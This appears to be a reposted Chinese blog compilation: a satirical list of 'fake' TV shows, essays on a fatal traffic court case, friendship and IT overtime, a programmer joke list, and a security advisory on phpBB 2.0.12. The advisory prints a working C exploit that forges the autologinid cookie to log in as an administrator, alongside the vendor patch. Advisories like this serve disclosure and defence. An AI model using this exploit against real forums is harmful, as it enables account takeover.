上榜理由:不知是哪部电影里面有这样一个情节,一个人看另一个人假模假式实在不顺眼了,义愤地说:"真想扁他!"我看《非常6+1》,也会生出这样的义愤。首先,那些选手的来路就很不明,6天时间能在台上星模星样的,一般人能做到吗?莫非又是什么选星选秀的后备力量?其次,那些个训练情节(包括尖锐激烈的矛盾冲突痛苦纠缠的感情纠葛大彻大悟的人生感悟以及种种爱恨情仇恩怨是非......)叫我吐啊吐的怎么也不习惯啊。人为的产生惊喜、人为的制造矛盾、人为的解决矛盾,你当演电视剧啊,你当观众一点分辨能力都没有了是不?最后,重点说说那极其黑暗的砸蛋环节——我可以负责任的说,电话联线的热心观众百分之就是都是假的,从那些做作的声做作的情感就可以听出来,假的终究是假的。为什么?因为节目根本就没有那么多奖品!深谙电视制作的人都会知道,一般情况下,很多奖品都是杜撰出来的,什么短信抽奖电话抽奖,都是空手套白狼骗骗热心观众的钱罢了,到时候,拿个内部人员的号码做中奖的了事!谁知道?另外,网上也透露出来了,据细心观众发现,居然同一个人在三次节目中都作为现场热心观众上台砸了蛋!这说明了什么?说明《非常6+1》不仅无耻的作假,而且作得一点技术含量都没有,真的把观众当傻帽了!
话说回来——谁要为这节目说话,我跟谁急!
虚假宣言:非常虚假,非常无耻!
虚假榜第一名:——当当当当!隆重推出,《亲门耳番》
上榜理由:还用说吗?还用说吗?假得连真名我都不想写了!
话说回来:还用说吗?还用说吗?这档伟大的节目不用任何人为它说话!
虚假宣言:还用说吗?还用说吗?虚假到极致,就变成了真理!
看,一个中国人死了
2004年11月20日,一位36岁的男子,在尚未取得驾照的情况下开车,在北京的一个小区4号楼前面,撞倒一位王姓老太太,致使68岁的王老太太当场死亡。2005年3月23号,院以过失致人死亡罪判处该男子有期徒刑壹年。这位男子对判决不满意,表示将要上诉。估计很多人看到这里都会认为此人是一位实力派人物。非也。该男名叫萨拉姆,是孟加拉人民共和国公民。做出这一判决的法院是北京市一中院(《京华时报》报道)。
显然做出如此判决的关键因素在于萨拉姆是一位"友邦人士"。问题是,中国人的性命在友邦人士面前竟然如此不值钱吗?其实问题毋宁是中国人自己有没有正视同胞的生命。倘若是为着友邦人士的观感而不惜运用法律的手段草菅同胞的生命,友邦人士会因此而格外瞧得起中国人吗?大谬。古语云:人必自侮而后人侮之。中国人自己都不把中国人的性命当一回事,难道外国人会因此认为中国人够哥们吗?君不见,萨拉姆先生不是表示要上诉了吗?至少我们无法认为萨拉姆先生上诉的原因是觉得量刑太轻,犹如我敢断定慈禧说出"宁与洋人,不与家奴"的时候,"洋人"断不会对中国人敬意有加。
人固有一死,或重于泰山,或轻于鸿毛——中国人果然智慧无比,两千年前就能说出这样的话来。事实上也的确是这样。即使有此例在,我们也不能就斩钉截铁的断定中国人在涉外的时候不重视同胞的性命。比如说,我们可以举出好些例子来证明中国人如何重视同胞的性命,比如说邵云环、许杏虎、朱颖;比如说王伟。甚至有一些同胞,仅仅是受了皮肉之苦,还远没有到性命攸关的地步,也照样闹得纷纷扬扬,举国皆知,比如说赵燕。然而稍稍运用一下脑筋就可以发现,这些人的得到重视,都是有其背景的,比如说,与某国的外交关系。然而王老太太太呢?
中国的升斗小民,上报纸的机会不多,王老太太好不容易上一回报纸(肯定是最后一回了),报纸也不屑登出她的名字。因为她没有值得大书特书的背景,假如王老太太是被日本人撞死的该多好啊,至少当天就可以举国皆知,然后还会有一批爱国青年发泄他们的愤怒。然而这事情丝毫由不得她选择,她只不过在自己的国土上,在自家门口突遭横祸而已。正因为她的平凡,北京市一中院觉得她应该是轻于鸿毛的那一类。然而我们的法律就是这么保护自己的公民的么?如果我们的法律不能保护自己的公民,那么——不要问友邦人士是不是瞧得起我们,要问问我们自己生活在这片土地上是不是幸福安乐。
看,一个普通的中国人死了。普通到连名字都没有的中国人,死了。死了便也死了。
犹使我心寒的,是居然用法律的手段来做出此判决。法律是什么?法律是小民们可以倚仗的最后一件武器。然而法律竟然也犹如人的胳膊肘一般可以任意角度弯曲。这等于是说,嘿,外国人,来撞吧,我们不敢怎么样的。一位名叫费依的美国青年,因为在新加坡乱涂乱画,被新加坡[着重]按照新加坡法律[着重]判处鞭刑。消息一出,美国大哗,克林顿总统亲自为之求情,然而新加坡人却并不肯卖账,只是少抽了两鞭而已。据说此事的结果是美国人到新加坡之后,第一件要紧的事就是学习新加坡的法律——当然,这就不太可能出现撞死新加坡人被判一年之后还要上诉的事情了。
我们知道严复,当年为了"师夷长技"跑到国外去留学。为了提高外语水平,他喜欢到法庭去听庭审。听了一阵子之后他发现,原来外国之强,不是靠船坚炮利,而是因为外国的法律竟然如此认真的保护每一个人的权益!
是啊,我们的眼界,过多的被泰山占据着,以至于我们确信那就是全部——虽然我们还会说另一句话:历史是人民群众创造的——而事实上,如果每一根鸿毛都得不到重视的话,幸福就不是我们的。就好比开头所引的新闻,如果那家伙是个实力派人物的话,我们也就认了。
听说现在有一个说法叫"盛世",我不知道这是什么意思,又或者,这个盛世是谁的——至少不是王老太太的。
附:《京华时报》新闻原文(链接:http://www.bjt.net.cn/news.asp?newsid=97789)
本报讯 (记者王阳)去年11月,孟加拉人萨拉姆在北京交通肇事撞死1人。前天,在市一中院,他被以过失致人死亡罪判处1年徒刑。
36岁的萨拉姆,是孟加拉人民共和国公民。2004年11月20日9时许,在石景山首钢十万平小区的4号楼前,萨拉姆驾驶一辆松花江牌微型客车由东向西倒车。在倒车过程中,因为注意力不集中,萨拉姆将路过此地的68岁老太太王某撞倒。王某因颅脑损伤当场死亡。
市一中院认定,在未取得中华人民共和国机动车驾驶证的情况下,萨拉姆擅自驾车将人撞倒,并导致对方死亡,这一行为已构成过失致人死亡罪。据悉,一审宣判后,萨拉姆表示要上诉。
一生有你,可以吗?
于是想起了太多太多人。曾经擦肩而过的杨思琪,死得不能再死的死党小梁、光线,远在澳大利亚的石头还有远在新加坡的恬恬......我想我前世一定累得脖子疼,不然这辈子就不会突然就变得不再孤单,也不会有着太多的牵挂。
佛曰,前世的五百次回眸换来今生的一次擦肩而过。
于是想起了太多太多人。曾经擦肩而过的杨思琪,死得不能再死的死党小梁、光线,远在澳大利亚的石头还有远在新加坡的恬恬......我想我前世一定累得脖子疼,不然这辈子就不会突然就变得不再孤单,也不会有着太多的牵挂。
可是为什么我会突然就又孤单呢?难道上辈子我的脖子累得断掉了?
或者,事实是原本无缘的我们,在错误的时间错误的地点,错误地相识?
很多人在朋友们离开我的时候对我说,天下没有不散的筵席。可是我特别希望能有朋友陪我一生,哪怕这样的人只有一个。
我哥们儿听了这话不以为然地说,如果有朋友能一生都陪你那还要老婆干 嘛!?我听了特无奈地笑笑。
爱人和朋友对于一个人的意义是一样的吗?
也难怪哥们儿说过:"为兄弟可以两肋插刀,为老婆可以插兄弟一刀。"是因为只有爱人才能在你身边待一辈子吗?
如果可以选择,我希望下辈子投胎成一只N头龙,只有九个头是肯定不够的,然后对着两个人不停不停地回头,直到把脖子累断。
因为。
一直希望有一天自己的愿望能实现,能有个一辈子不分开的朋友。
另一个呢,是爱人。
太想对朋友说一声,希望《一生有你》。
可以吗?
IT人特有的夜生活
每一个夜,我都在生活着。但如果很暧昧的把它称之为"夜生活",我总认为有些牵强。因为,印象中的"夜生活",总是与红男绿女、一掷千金有着千丝万缕的瓜葛和联系。而现在,我的夜,陪伴着的只有桌上的一盏台灯和面前的三五本考研资料。
做IT这一行的,大多很年轻。因此,大学时无忧无虑的夜生活,在脑海中远未淡忘。在三五成群聚会时那是很值得回忆的谈资。那时的夜,仿佛很短,短得二圈牌还没有打完,便已看到窗外破晓的鱼肚白;那时的夜,仿佛很长,看着宿舍中几位彻夜不归哥们的空铺,想象着他们花天酒地在外抱得美人归的神情,长得又让人度日如年。就这样,大学时的夜便在这一长一短,一短一长中逝去了,虚度了。 ....
五年前,我脱去了自己幼稚的学生装走入社会;三年前,我加入北漂一族踏入IT这一行。在二000年,正是网络神话风行的时节,那时做计算机、搞网络的似乎个个都腰缠万贯,极具吸引力。现在我还记得有这样一个笑话,说蜜蜂与蜘蛛结婚,蜜蜂嫌弃蜘蛛长相太差,蜜蜂妈妈便以过来人的高瞻远瞩劝慰她说,蜘蛛是搞网络的,有钱途,跟着他没错的。
尽管不是这个笑话促使我进入IT这一行,但这则笑话多少让我对IT人的"幸福生活"有种神往:抱着笔记本电脑,过着美利坚的作息规律;双手飞快地在键盘上噼呖啪啦的敲打,一行行代码在屏幕上显现,接着编译、调试,再编译、再调试;最后,月底发薪能拿到厚厚一迭钞票,于是乎,便很惬意地过上小资般的夜生活。
人们总是说,现实与理想有着很大的差距。但当这种差距摆在面前时,你会发现即使自己有了心理准备也会觉得很难接受这种如壤之别的差距!
现实就是现实,IT人的夜生活也是如些。
从我刚到公司上班的那天起,我就更深地体会到了做一个别人所"艳羡"的IT人所必须付出的代价。八小时工作制,很多的IT公司都在很不错地贯彻执行国家劳动法所规定的这一条款,但我想,我需要给他加一个期限——白天。"白天八小时工作制",不错,在白天,我们是工作八个小时,而到了夜晚,等待我们的是工作,还是工作,永远看不到尽头的工作,但那已经不属于"白天八小时工作制"的范围了。它属于夜,属于IT人所特有的夜生活。
在很多写字楼,超过十点后,仍然会有闪耀灯光的公司,在那里依然是人头攒动。不用问,十有八九是一间IT公司,而那攒动的人群,便是一如我一样劳累着的IT青年。至今,我都难忘那次的加班经历:晚上8点多,我刚吃完饭,部门经理通知我,暂时不要走,研发部一新产品已进入最后测试,可能今夜就有结果。如果测试通过,我需要连夜熟悉产品,并在明早上班之前赶出产品的试用手记,并发给相关的媒体记者。于是,我一边打着游戏,一边等着开始工作。晚十一点多,终于从研发部拿到产品。于是,我与部门经理两人同时开工。过十二点,时间开始变得恍惚,头脑中也不时弹出些莫名的东西,我们拼命抽着烟,不时到洗手间用凉水冲洗。此时,公司里加班的同事已逐渐撤退,偌大的办公区静得能听到我们俩人沉重的喘息声。凌晨一点多,产品已完整使用了一遍,下面便开始最痛苦的写作。此时,人已经进入一种半昏迷的状态。我知道自己意识是清楚的,因为我能听到敲击键盘的声音,但思维又是不清楚的,因为我写的些什么,我已经记得不是很清了。凌晨五点多,终于,大功告成。此时,我已经倦意全无,回去后躺在床上我只能对着天花板发呆。熬到早上八点,准时从床上弹起来,然后赶往公司,继续新一天的工作。这样的故事相信会为很多IT人所熟悉,这种单调无奇、毫无生趣的夜生活也为很多IT人所经历。
每个人都在为自己的梦想而奋斗,我想这也是很多人当初选择IT行业的初衷。在这个年青人的社会里,每个人的头脑中只有奋斗两个字;在这个日新月异、变化飞速的行业里,每个人的脸上只刻着工作两个字。每一天你都要前进,每一天你都必须进取,这样你离成功才会越来越近。那句著名的"八小时工作,二十四小时思考"是很多象我这样的IT人的座右铭。
夜,不会因为工作而消逝;夜生活,也同样不会因为工作而远去。只是我们这些IT人的夜,我们这些IT人的夜生活,早已没有了莺歌燕舞,写滿的全是困顿和迷茫。一个没有时间去思考自我,没有时间去规划未来,只知道机械的不知疲倦工作的人,与形尸走肉有多大的分别?
迷茫之时,我选择了考研。选择了考研之后的夜,我暂时不再迷茫:为了求取胜利的斗志激励我更加努力,虽然这使得我更加辛苦;为了追求现实的目标鼓励我更加努力,虽然这使得我更加疲倦。尽管我越来越远离那灯红酒绿的夜生活,但是也我知道,我越来越接近自己的目标。
没有夜生活,只有孤灯相伴,但我依然无悔。
<转自SOHU社区>
这才是真正的程序员-幽默
真正的程序员从来不写注释,难写的程序必定也难读。
真正的程序员不写应用程序,他们直接从最底层的裸机开始编程。他们认为应用程序编程是那些不会系统编程的人干的活。
真正的程序员不画流程图,流程图是没文化的人的文档,居住在山洞里的人才在岩壁上画流程图。
真正的程序员从来不写注释,难写的程序必定也难读。
真正的程序员不写应用程序,他们直接从最底层的裸机开始编程。他们认为应用程序编程是那些不会系统编程的人干的活。
真正的程序员不画流程图,流程图是没文化的人的文档,居住在山洞里的人才在岩壁上画流程图。
真正的程序员不读手册,依赖手册是无知和懦弱的表现。
真正的程序员从不一次做对,他们可以连续30个小时坐在机器前面给程序打补丁。
真正的程序员从不按早9晚5的生活过日子,如果你在早上9点看见一个程序员,那一定是他一夜未眠。
真正的程序员比用户还清楚用户需要什么。
真正的程序员喜欢兼卖爆米花,他们利用CPU散发出的热量做爆米花,可以根据米花爆裂的速度听出正在运行什么程序。
phpBB 2.0.12非法获取管理员权限及路径泄露漏洞
phpBB 2.0.12版本中存在两个安全漏洞,其中一个很严重,允许任意用户都可以获取管理权限,另外一个漏洞会导致服务器路径泄露。
[受影响系统]:
phpBB Group phpBB 2.0.12
--------------------------------------------------------------------------------
[不受影响系统]:
phpBB Group phpBB 2.0.13
--------------------------------------------------------------------------------
[漏洞描述]:
phpBB是一种用PHP语言实现的基于Web脚本的开放源码论坛程序,使用较为广泛。
phpBB 2.0.12版本中存在两个安全漏洞,其中一个很严重,允许任意用户都可以获取管理权限,另外一个漏洞会导致服务器路径泄露。
第一个漏洞存在于includes/sessions.php文件中,其对$sessiondata['autologinid']变量的类型及比较操作存在问题,远程攻击者可以通过伪造特别的变量值使用判断用户合法性的操作始终返回真,从而使用任意用户可以在不知道口令的情况下以管理员的身份认证成功。第二个漏洞在于viewtopic.php文件中,由于对消息的过滤不充分,使路径泄露成为可能。
<*来源:federico gonzales (elrengo94@hotmail.com)
链接:_blank>http://marc.theaimsgroup.com/?l=bugtraq&m=110970201920206&w=2
_blank>http://www.phpbb.com/phpBB/viewtopic.php?t=267563
*>
--------------------------------------------------------------------------------
[测试方法]:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
Author: Paisterist
Date: 28-02-05
[N]eo [S]ecurity [T]eam ©
描述:这个攻击程序可以修改cookies.txt(Firefox和Mozilla)文件中的用户ID。你必须要登陆到没有选定autologin选项的论坛,然后关闭导航器,执行攻击。
注意:必须将攻击代码放置在cookies.txt的同一目录内。攻击可以覆盖指定了用户ID的所有phpbb cookies。
By Paisterist
_blank>http://neosecurityteam.net
_blank>http://neosecurityteam.tk
Greetz: Hackzatan, Crashcool, Towner, Daemon21, Wokkko, Maxx, Arcanhell, Alluz.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char** argv[]) {
FILE *pointer;
char contenido[10000],
cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22us \
erid%22%3Bs%3A1%3A%22", cookief[9]="%22%3B%7D", cookiec[106],
cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22useri \
d%22%3Bs%3A1%3A%222%22%3B%7D",
*pos;
int p=0, i=0;
if (argc!=2) {
printf("Usage: phpbb_exploit.exe user_id\n\n");
exit(0);
}
pointer=fopen("cookies.txt", "r");
if (pointer) {
fread(contenido, 300, 10, pointer);
fclose(pointer);
} else {
printf("The file can't be open\n");
exit(0);
}
strcpy(cookiec, cookie);
strncat(cookiec, argv[1], 6);
strcat(cookiec, cookief);
if (pos=strstr(contenido, cookiec)) {
p=pos - contenido;
while (i<92) {
if (cookie_false[i]!=NULL)
contenido[p]=cookie_false[i];
p++;
i++;
}
}
else {
printf("The file cookies.txt isn't valid for execute the exploit or the user \
id is incorrect\n"); exit(0);
}
if (pointer=fopen("cookies.txt", "w")) {
fputs(contenido, pointer);
printf("Cookie modified: \n\n%s\n\n", contenido);
printf("The cookies file has overwriten... looks like the exploit has worked");
} else printf("\n\nThe file cookies.txt has not write permissions.");
return 0;
}
--------------------------------------------------------------------------------
[安全建议]:
厂商补丁:
phpBB Group
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
_blank>http://www.phpbb.com/downloads.php
也可按照如下方法修复:
1 获取管理权限漏洞
打开includes/sessions.php
请找到以下代码:
if( $sessiondata['autologinid'] == $auto_login_key )
替换为:
if( $sessiondata['autologinid'] === $auto_login_key )
2 路径泄漏漏洞
打开viewtopic.php
请找到以下代码:
$message = str_replace('\"', '"', substr(preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se', "preg_replace('#\b(" . $highlight_match . ")\b#i', '<span style=\"color:#" . $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')", '>' . $message . '<'), 1, -1));
替换为:
$message = str_replace('\"', '"', substr(@preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se', "@preg_replace('#\b(" . $highlight_match . ")\b#i', '<span style=\"color:#" . $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')", '>' . $message . '<'), 1, -1));